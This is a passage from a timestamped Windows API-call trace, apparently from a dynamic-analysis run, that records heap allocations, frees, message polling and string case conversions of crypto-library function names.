lpMsg=0x87f36c) returned 0 [0198.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0198.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0198.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0198.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0198.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0198.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1811c) returned 0xbea018 [0198.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0198.813] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0198.813] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0198.813] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0198.813] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0198.813] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0198.813] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0198.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0198.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0198.813] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0198.813] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0198.813] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0198.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0198.813] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0198.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0198.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0198.813] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0198.813] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.813] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0198.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0198.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2708 [0198.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0198.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0198.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0198.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0198.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1811c) returned 0xbea018 [0198.813] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0198.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2788 [0198.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0198.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0198.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0198.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2678 [0198.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0198.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0198.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0198.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2618 [0198.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0198.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0198.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0198.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd9d8 [0198.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0198.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0198.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0198.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0198.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0198.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1811c) returned 0xa77130 [0198.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0198.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0198.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0198.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0198.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0198.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0198.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0198.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0198.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0198.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0198.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0198.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0198.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0198.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0198.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0198.815] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0198.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0198.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0198.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0198.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0198.816] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0198.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0198.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0198.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0198.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0198.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0198.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0198.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0198.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0198.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0198.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0198.816] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0198.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0198.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0198.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0198.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2808 [0198.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0198.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0198.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0198.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0198.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd540 [0198.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0198.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0198.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0198.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0198.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0198.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0198.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0198.817] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0198.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0198.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0198.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0198.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0198.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0198.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0198.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0198.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deb78 [0198.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0198.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0198.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0198.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0198.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0198.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0198.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0198.817] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0198.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa548 [0198.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0198.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0198.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0198.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0198.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0198.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0198.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0198.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0198.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0198.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0198.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0198.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0198.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0198.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0198.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0198.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0198.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0198.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0198.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0198.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0198.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0198.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0198.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0198.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0198.818] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0198.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deb78 [0198.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0198.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0198.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0198.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0198.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0198.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0198.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0198.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0198.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0198.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0198.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0198.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0198.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0198.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0198.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0198.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0198.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0198.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0198.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0198.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0198.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0198.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0198.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0198.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0198.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0198.819] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0198.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deb78 [0198.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0198.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0198.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0198.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0198.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0198.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0198.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0198.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0198.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0198.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0198.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0198.819] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0198.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0198.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba0d8 [0198.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0198.820] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0198.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0198.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0198.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0198.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0198.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0198.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0198.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0198.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0198.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0198.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0198.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0198.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0198.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0198.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0198.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0198.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0198.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0198.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0198.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0198.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0198.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0198.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0198.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0198.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0198.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0198.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0198.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0198.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0198.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0198.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0198.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0198.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0198.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0198.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0198.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0198.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0198.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0198.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0198.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0198.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0198.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0198.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0198.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0198.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0198.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0198.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0198.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0198.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0198.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0198.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0198.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: 